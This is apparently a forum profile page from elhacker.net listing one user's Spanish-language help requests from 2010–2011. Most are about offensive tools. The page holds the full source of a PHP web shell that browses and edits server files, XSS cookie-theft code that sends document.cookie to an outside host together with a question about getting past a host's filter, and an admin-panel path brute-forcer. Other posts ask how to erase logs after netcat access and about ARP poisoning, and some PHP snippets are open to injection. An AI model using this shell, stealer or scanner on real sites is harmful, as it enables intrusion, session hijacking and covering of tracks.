elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


  Mostrar Temas
Páginas: [1]
1  Programación / PHP / Ayuda con base de datos en: 21 Junio 2011, 02:09 am
hola foro, les vengo con una consulta, estoy intentando montar un sistema de puntos en mi web, esta consta con una base de datos llamada muro, aca les dejo el code (Mysql)

Código
Código
  1. CREATE TABLE muro(
  2. id INT UNSIGNED,
  3. usuario VARCHAR(30) NOT NULL,
  4. post VARCHAR(255) NOT NULL,
  5. fecha datetime UNSIGNED,
  6. megusta INT UNSIGNED,
  7. PRIMARY KEY(id)
  8. );


y el code problematico es este


Código
Código
  1. <?php
  2.  
  3. $text = $_REQUEST['publicar'];
  4. $replace = '@(<script>| onload | onerror | )@';
  5. include("Consultas/conectar.php");
  6. $url_actual = "http://" . $_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"];
  7. if($url_actual=="http://localhost/UPLOAD/menu.php") {
  8.  
  9. $quer = mysql_query("SELECT id,usuario,post,fecha from muro order by id desc",$conexion);
  10. while($querr = mysql_fetch_array($quer)) {
  11. $numero = strlen($querr['usuario']);
  12.  
  13. echo "<br><div id=down>";
  14.  
  15. echo "<img src=imagenes/imagendefault.png></img>";
  16. echo  "<a href=http://localhost/UPLOAD/perfiles/$querr[usuario].php>";
  17. echo "&nbsp;";
  18. echo $querr['usuario'].":";
  19. echo "<br></a>";
  20. for($i=0;$i<$numero;$i++) {
  21. echo "&nbsp;&nbsp;";
  22. }
  23. $fa = $querr['post'];
  24. $post = preg_replace($replace,' ',$fa);
  25.  
  26.  
  27. echo $post;
  28. $id = $querr['id'];
  29.  
  30.  
  31. echo "<br><br>";
  32.  
  33.  echo "<div id=fan3>";
  34.  
  35. echo $querr['fecha'];
  36. echo "<form method=post action=$url_actual>";
  37. echo "<input type=submit value=+1 name=megusta>";
  38. echo "<input type=submit value=-1 name=nomegusta>";
  39.  
  40.  
  41. echo "</form>";
  42.  
  43. echo "<br>";
  44.  
  45.  
  46. echo "</div>";
  47.  
  48. echo "<br><hr>";
  49.  
  50. }
  51. }
  52. if(isset($_REQUEST['megusta'])) {
  53. mysql_query("UPDATE muro set megusta=23 where id=$id",$conexion);
  54. }

el problema es que siempre me inserta el valor de me gusta en id=1 de la tabla... alguien sabe que estoy haciendo mal ? muchas gracias
2  Seguridad Informática / Seguridad / Informatica forense + ayuda rifiuti en: 6 Agosto 2010, 11:13 am
Hola a todo el foro de seguridad  ;D, les traigo una pregunta  :-[
estaba siguiendo el tutorial que hay en esta comunidad de Informatica forense

http://www.elhacker.net/InfoForenseWindows2.html

Despues de haber bajado el programa rifiuti.exe
intento acceder a la ruta donde se encuentra info2

que supuestamente seria aca:

Citar
c:\recycler\S-1-5-21-27800051451-1340124367-2516573698-1128

y me responde que no se puede encontrar la ruta :S

alguien sabe a que se debe esto ?

muchas gracias :)  ;D
3  Programación / PHP / problema en codigo :( en: 1 Agosto 2010, 06:24 am
Hola gente, estoy realizando una webshell y me surgio un problema, la webshell la pantalla principal consta de un menu para ver archivos info del servidor y creditos

bueno el problema es que cuando voy a la parte de de informacion del servidor se mete tambien lo que hay en menu :(
lo mejor va a ser que lo vean..
les dejo el codigo

Código
  1. <html>
  2. <head>
  3. <title> K0D4K Sh3LL! </title>
  4. <style type="text/css">
  5. body {
  6. background-color:#000000;
  7. cursor:crosshair;
  8.  
  9. font-family:monospace;
  10. }
  11.  
  12. datitos{
  13. color:FF0000;
  14. font-weight:bold;
  15. font-family:verdana;
  16. font-size:15px;
  17. }
  18.  
  19. carteles {
  20. font-size:20px;
  21. color:#FF8000;
  22. font-weight:bold;
  23. }
  24.  
  25. directorios{
  26. font-size:small;
  27. font-type:Comic Sans Ms;
  28. font-color:red;
  29. font-family:verdana;
  30. font-weight:bold;
  31. }
  32.  
  33. table
  34. {
  35. font-size:13px;
  36.   border-collapse: collapse;
  37. }
  38.  
  39. th
  40. {
  41.   border-right: 1px solid #000;
  42.   border-bottom: 1px solid #000;
  43.   padding: 0.5em;
  44.   background-color:#FF8000;
  45. }
  46.  
  47. corchetes {
  48. color:#FF0000;
  49. font-family:verdana;
  50. font-size:26px;
  51. font-weight:bold;
  52. font-style:italic;
  53. }
  54.  
  55. signos {
  56. font-weight:bold;
  57. color:#FF8000;
  58. font-size:24px;
  59. }
  60.  
  61. k{
  62. color:#FF0000;
  63. font-size:25px;
  64. font-weight:bold;
  65. font-style:italic;
  66. font-family:verdana;
  67. }
  68.  
  69. cero{
  70. color:#FF8000;
  71. font-size:23px;
  72. font-size:25px;
  73. font-weight:bold;
  74. font-style:italic;
  75. font-family:verdana;
  76. }
  77.  
  78. guion{
  79. color:#FF8000;
  80. font-size:25px;
  81. }
  82.  
  83.  
  84. a:link {
  85. font-size:15px;
  86. color:red;
  87. text-decoration:none;
  88. }
  89. a:visited{
  90. color:red;
  91. text-decoration:none;
  92. }
  93. a:hover {
  94. cursor:crosshair;
  95. color:orange;
  96. text-decoration:none;
  97. font-size:16px;
  98. }
  99.  
  100. datos{
  101. font-size:medium;
  102. color:#FF8000;
  103. font-family:verdana;
  104. }
  105.  
  106.  
  107. </style>
  108. <title> K0D4K Web Sh3LL! </title>
  109. </head>
  110. <body>
  111. <center>
  112. <corchetes>[</corchetes><signos>!</signos><corchetes>]</corchetes>
  113. <k> K</k> <cero>0</cero> <k>D</k> <cero>4</cero> <k>K</k>   <guion>-</guion>   <k>S</k> <cero>H</cero> <k>3</k> <cero>L</cero> <k>L</k> <corchetes>[</corchetes><signos>!</signos><corchetes>]</corchetes></center>
  114.   <br><br>     <center>
  115.  
  116.     <center>     <br><br>
  117. <div style="bottom: 50%%; width: 60%; left: 23%; right: 7%; top: 28%;
  118. visibility: visible; z-index:10; font-family: Courier New; background-color: #000000;border:1.5px orange dashed; text-decoration: none; text-aling: center;">
  119.  
  120. <center>         <br>
  121.  
  122. <a href="?shell=archivo"> Ver Archivos </a><br>
  123. <a href="?shell=datos"> Informacion Del Servidor </a><br>
  124. <a href="?shell=phpinfo"> Link3</a>  <br>
  125. <a href="?shell=creditos">Creditos</a>     <br>
  126.  
  127.  
  128. </div></center></center>
  129. <br>
  130.  
  131. <?php
  132.  
  133.  
  134.  
  135. if(isset($_GET['path'])) {
  136. $path = $_GET['path'];
  137. $dir = dir($path);
  138. }
  139. else {
  140. $path = getcwd();
  141. $dir = dir($path);
  142. }
  143. if($_GET['shell'] == "archivo" or $_GET['path']!== "") {
  144.  
  145. echo "<br>";
  146.  echo "<div align=right>";
  147. echo "<table><tr>";
  148. echo "<th>Posicion:</th><th>";
  149. echo "$path";
  150. echo "</th>";
  151. echo "</table>";
  152. echo "</div>";
  153. echo "</chica>";
  154. echo "<br>";
  155.  
  156.            echo "<center>";
  157. echo "<carteles><br>";
  158. echo "Directorios:<br>";
  159. "</carteles>";
  160. $contador = 0;
  161. while ($file = $dir->read()) {
  162. $extension = filetype($path."/".$file);
  163. if ($extension == "dir") {
  164. $contador+=1;
  165. $ruta = urlencode($path."/".$file);
  166. echo "<directorios>";
  167. echo "<a href=?path=".$ruta.">".$file."</a><br>";
  168. }
  169. }
  170. echo "</directorios>";
  171.  
  172. echo "<br><br><carteles>";
  173. echo "Archivos:";
  174. echo "</carteles><br>";
  175. $dir->rewind();
  176. $contador=0;
  177. while($file = $dir->read()) {
  178. $extension=filetype($path."/".$file);
  179. if ($extension !=="dir") {
  180. $contador+=1;
  181. $ruta=urlencode($path."/".$file);
  182. echo "<directorios>";
  183. echo "<a href=?view=".$ruta.">".$file."</a><br>";}}
  184. if ($contador==0) {
  185. echo "No hay archivos en el directorio";
  186. }
  187. echo "<br><br>";
  188. echo "</center>";
  189. $dir->close();
  190. echo "</directorios>";
  191.  
  192.  
  193. if(isset($_GET['view'])) {
  194. $ruta = $_GET['view'];
  195. echo "<h2><font color=orange><center>";
  196. echo "Editando: $ruta";
  197. echo "</font></center></h2>";
  198. echo "<center>";
  199. echo "<form method=POST action=\"\">";
  200.  
  201. echo "<div style=133%><textarea name=\"modi\" cols=35 rows=15>";
  202. $abrir=fopen($ruta,"r");
  203. $texto = fread($abrir, filesize($ruta));
  204. echo htmlentities($texto);
  205. echo "</textarea></div>";
  206.  
  207. echo "<input type=submit name=\"Change\" value=\"Editar\">";
  208. echo "</form>";
  209. echo "</center>";
  210. if(isset($_POST['Change'])) {
  211. $arc=fopen($ruta, "w+");
  212. $txt=$_POST['modi'];
  213. @$ok = fwrite($arc,$txt);
  214. }
  215. }
  216. }
  217. ?>
  218. <?php
  219. if($_GET['shell']=="datos") {
  220. echo "<br><br><br>";
  221. $servers=$_SERVER['SERVER_SOFTWARE'];
  222. $ipserver=$_SERVER['SERVER_ADDR'];
  223. $lugarshell=$_SERVER['SCRIPT_FILENAME'];
  224. echo "<carteles>";
  225. echo "Datos del servidor:";
  226. echo "</carteles>";
  227.  
  228. echo "<br><br><br>";
  229. echo "<datos>";
  230. echo "Version de software: ";
  231. echo "</datos>";
  232. echo "<datitos>";
  233. echo $servers;
  234. echo "</datitos>";
  235. echo "</info>";
  236. echo "<br>";
  237. echo "<datos>";
  238. echo "IP del servidor: ";
  239. echo "</datos>";
  240. echo "<datitos>";
  241. echo $ipserver;
  242. echo "</datitos>";
  243. echo "<br>";
  244. echo "<datos>";
  245. echo "Directorio shell: ";
  246. echo "</datos>";
  247. echo "<datitos>";
  248. echo $lugarshell;
  249. echo "</datitos>";
  250. }
  251. ?>
  252. <?php
  253. if($_GET['shell'] == "creditos") {
  254. header("location: http://www.kodakwebshell.blogspot.com/search/labels/creditos");
  255.  
  256. }
  257. ?>
  258. </body>
  259. </html>

muchas gracias
4  Seguridad Informática / Nivel Web / Problema con añadimiento en codigo en: 29 Julio 2010, 04:42 am
Hola gente miren estaba montando un servidor de pruebas y lo subi a mi@

los codigos son los siguientes:

webv.php

Código:
<?php
session_start();
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Bienvenidos a XSS testing</title>
</head>
   
<body><center>
<h1><font color=red>XSS Testing</font></h1></center>
<div align=center>
<form method="post" action="busca.php" >
<input type="text" name="busca" value="Buscador Vulnerable" maxlength="222">
<input type="submit" value="buscar">
</form>
</div>
<br><br><br>
<form method="post" action="pag2.php">
<font color=red>Ingrese su usuario:    <input type="text" name="nombre">
<br>
Ingrese su contraseña: </font><input type="password" name="password">
<br>
<input type="submit" value="enviar">
</form>
</body>
</html>

busca.php

Código:
<?php
$bus = $_REQUEST['busca'];

echo ($bus);
?>

pag2.php

Código:
<?php
$user=$_POST['nombre'];
$pass = $_POST['password'];
if ($user == "franco"  && $pass == "franco")
{
setcookie("senia", $user."-". $pass, time()+60*60*24*365, "/");
echo "Bienvenido $user";
}
else
{
echo "usuario o contraseña incorrcto:";
}
?>

cookie.js

Código:
document.write("<iframe width='0' height='0' src='http://www.pruebas18p.webcindario.com/cookie.php?c="+document.cookie+"'></iframe>");

cookie.php

Código:
<?php
$cookie=$_GET['c'];
$file=fopen('archivo.txt', 'a');
fwrite($file, $cookie.' - ');
fclose($file);
?>

esta es la url vulnerable a nivel localhost:

http://localhost/busca.php?busca=<script src="http://localhost/cookie.js"</script>

El codigo que interpretaria busca.php seria <script src="http://Http://localhost/cookie.js"</script>

pero mi@ es el siguiente

Código:
<script src=\"http://www.pruebas18p.webcindario.com/cookie.js\"</script>
<!-- Inserted by miarroba -->
<script type="text/javascript" src="http://weborama.miarroba.info/?d=hosting&amp;h=pruebas18p.webcindario.com&amp;t=1280371273&amp;k=5c4e108c6ef14544954ee758c7790aa0"></script>
<!-- Inserted by miarroba -->



Bueno a nivel localhost no hay problema, puedo obtener tranquilamente las cookies, pero en mi arroba no se puede ejecutar el script

alguien sabe alguna forma de bypassear ese filtro que tiene mi arroba ?

gracias :)
5  Seguridad Informática / Nivel Web / duda xss en: 24 Julio 2010, 08:55 am
Hola gente del foro, estaba en casa intentando practicar xss leyendo tutoriales, pero no me sale :S

miren hize unas paginas vulnerables, pero me sigue sin salir:

pagina: pindex.php

Código:
<?php
if(isset($_COOKIE['user'])) echo $_COOKIE['user'];
?>
<html>
<head>
</head>
<body>
<form method="post" action="buscador.php">
<input type="text" name="palabrita">
<br>
<input type="submit" value="enviar"></form>
</body>
</html>

buscador.php

Código:
<?php
$user = $_REQUEST['palabrita'];
setcookie("user", $user, time()+(60*60*24*365),"/");
?>
<html>
<head></head>
<body>
<a href="indexxx.php"> Pagina 1</a>
</body>
</html>

cookies.php

Código:
<?
$cookie = $_GET['cookie'];
$fff = fopen("archivo.txt","a");
fwrite($fff, $cookie);
fclose($fff);
?>

y esta es la url que mando:

Código:
http://localhost/buscador.php?palabrita=
<script>window.location='http://localhost/cookies.php?cookie='+document.cookie;</script>&enviar=;

el problema es que no me crea el archivo archivo.txt :S

alguien sabe a que se debe.. ? gracias
6  Programación / PHP / duda con directorios en: 22 Julio 2010, 07:59 am
Hola gente :) soy yo, con otra de mis dudas :(

En esta oportunidad las dudas saltaron trabajando con directorios... miren aca les dejo un codigo:

Código
  1. <?php
  2. $dir ="/";
  3. $directorio=opendir($dir); 
  4.  
  5. while($archivo=readdir($directorio))
  6. {
  7.  
  8. echo $archivo;
  9. echo date ("F d Y H:i:s.", filemtime($nombre_archivo));
  10.  
  11. echo "<br>";
  12. }
  13. closedir($directorio); 
  14. ?>
  15.  

Basicamente, no se como hacer para que me de la fecha de la ultima modificaciion ya que me tira error :s, busque por todas partes y no encontre nada :S

¿Que tengo mal?

Muchas gracias a todos :)
7  Programación / PHP / duda con panel finder en: 20 Julio 2010, 22:14 pm
hola gente :) soy nuevo en esta sección.. antes que nada gracias por todo :)
el foro esta estuppendo..

bueno voy a mi pregunta

estaba realizando un admin panel finder en php, pero no logro conseguir lo que busco, miren les dejo el codigo

consta de 2 paginas indexx.html y adminp.php

indexx.html:

Código
  2. <head><title>Admin Panel Finder 0.88</title></head>
  4. <form method="post" action="adminp.php">
  5. Ingrese la web:
  6. <input type="text" name="web" value="http://" size="30">
  7. <br><br>
  8. <input type="submit" value="probar">
  9. </form>
  10. </body>
  11. </html>
  12.  

adminp.php:

Código
  1. <?php
  2. $pagina=$_REQUEST['web'];
  3. function comprobar($url)
  4. {
  5. $fp=@fopen($url,"r");
  6. if($fp){
  7. return true;
  8. }
  9. else
  10. {
  11. return false;
  12. }
  13. @fclose ($fp);
  14. }
  15.  
  16.  
  17. $array = array(
  18. 	"admin1.php", "admin1.html", "admin2.php", "admin2.html", "yonetim.php", "yonetim.html", "yonetici.php", "yonetici.html", "ccms/", "ccms/login.php", "ccms/index.php",
  19. "maintenance/", "webmaster/", "adm/", "configuration/", "configure/", "websvn/", "admin/", "admin/account.php", "admin/account.html". "admin/index.php", "admin/index.html", "admin/login.php". "admin/login.html", "admin/home.php", "admin/controlpanel.html", "admin/controlpanel.php", "admin.php", "admin.html", "admin/cp.php", "admin/cp.html",
  20. "cp.php", "cp.html", "administrator/", "administrator/index.html", "administrator/index.php", "administrator/login.html", "administrator/login.php", "administrator/account.html", "administrator/account.php", "administrator.php", "administrator.html", "login.php", "login.html", "modelsearch/login.php", "moderator.php", "moderator.html", "moderator/login.php", "moderator/login.html", "moderator/admin.php", "moderator/admin.html", "moderator/", "account.php", "account.html", "controlpanel/", "controlpanel.php", "controlpanel.html", "admincontrol.php", "admincontrol.html", "adminpanel.php", "adminpanel.html", "admin1.asp", "admin2.asp", "yonetim.asp", "yonetici.asp", "admin/account.asp", "admin/index.asp", "admin/login.asp", "admin/home.asp", "admin/controlpanel.asp", "admin.asp", "admin/cp.asp", "cp.asp", "administrator/index.asp", "administrator/login.asp", "administrator/account.asp", "administrator.asp", "login.asp", "modelsearch/login.asp", "moderator.asp", "moderator/login.asp", "moderator/admin.asp", "account.asp", "controlpanel.asp", "admincontrol.asp", "adminpanel.asp", "fileadmin/", "fileadmin.php", "fileadmin.asp", "fileadmin.html", "administration/", "administration.php", "administration.html", "sysadmin.php", "sysadmin.html", "phpmyadmin/", "myadmin/", "sysadmin.asp", "sysadmin/", "ur-admin.asp", "ur-admin.php", "ur-admin.html", "ur-admin/", "Server.php", "Server.html", "Server.asp", "Server/", "wp-admin/", "administr8.php", "administr8.html", "administr8/", "administr8.asp", "webadmin/", "webadmin.php", "webadmin.asp", "webadmin.html", "administratie/", "admins/", "admins.php", "admins.asp", "admins.html", "administrivia/", "Database_Administration/", "WebAdmin/", "useradmin/", "sysadmins/", "admin1/", "system-administration/", "administrators/", "pgadmin/", "directadmin/", "staradmin/", "ServerAdministrator/", "SysAdmin/", "administer/", "LiveUser_Admin/", "sys-admin/", "typo3/", "panel/", "cpanel/", "cPanel/", "cpanel_file/", "platz_login/", "rcLogin/", "blogindex/", "formslogin/", "autologin/", "support_login/", "meta_login/", "manuallogin/", "simpleLogin/", "loginflat/", "utility_login/", "showlogin/", "memlogin/", "members/", "login-redirect/", "sub-login/", "wp-login/", "login1/", "dir-login/", "login_db/", "xlogin/", "smblogin/", "customer_login/", "UserLogin/", "login-us/", "acct_login/", "admin_area/", "bigadmin/", "project-admins/", "phppgadmin/", "pureadmin/", "sql-admin/", "radmind/", "openvpnadmin/", "wizmysqladmin/", "vadmind/", "ezsqliteadmin/", "hpwebjetadmin/", "newsadmin/", "adminpro/", "Lotus_Domino_Admin/", "bbadmin/", "vmailadmin/", "Indy_admin/", "ccp14admin/", "irc-macadmin/", "banneradmin/", "sshadmin/", "phpldapadmin/", "macadmin/", "administratoraccounts/", "admin4_account/", "admin4_colon/", "radmind-1/", "Super-Admin/", "AdminTools/", "cmsadmin/", "SysAdmin2/", "globes_admin/", "cadmins/", "phpSQLiteAdmin/", "navSiteAdmin/", "server_admin_small/","logo_sysadmin/", "server/", "database_administration/", "power_user/", "system_administration/", "ss_vms_admin_sm/"
  21. );
  22.  
  23. for ($i = 0; $i < count($array); $i++)
  24. {
  25. $existe= comprobar($pagina,"/",$array[$i]);
  26. if ($existe)
  27. {
  28. echo "existe";
  29. echo "<br>";
  30. }
  31. else
  32. {
  33. echo "no existe";
  34. echo "<br>";
  35. }}
  36.  
  37. ?>

bueno el problema es que en vez de ponerme una vez existe lo hace muchas veces.

creo que lo mejor va a ser que lo prueben uds para ver cual es el error..

muchas gracias :)
8  Seguridad Informática / Hacking / netcat.. ayuda en: 25 Marzo 2010, 00:16 am
Hola, tengo varias dudas respecto a netcat:

1) Alguien sabria borrar los logs que se dejan cuando ingresar a la pc ? en windows ?

2) Que mas se puede hacer ? es decir, yo solo vago por directorios mirando archivos, alguien tiene un tuto de como subir y bajar archivos...

Muchas gracias
9  Seguridad Informática / Hacking / Duda con envenamiento ARP en: 22 Marzo 2010, 10:17 am
Hola gente del foro :D
antes que nada muchas gracias por leer mi problema es el siguiente, leyendo este tutorial:

http://foro.elhacker.net/hacking_avanzado/taller_practico_de_intrusion_en_redes_locales-t45618.0.html

Me situo en la consola MS-DOS

y coloco arp -a

en ese instante me sale la IP del router y su direccion MAC., pero no me sale la Ip y MAC de mi ordenador....

pd: En la direccion los datos de mi router dice:

direccion IP                Direccion MAC                 Tipo

192.168.0.1                  xxxx-xxx-xx                 variado


Muchas gracias a todos :D
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines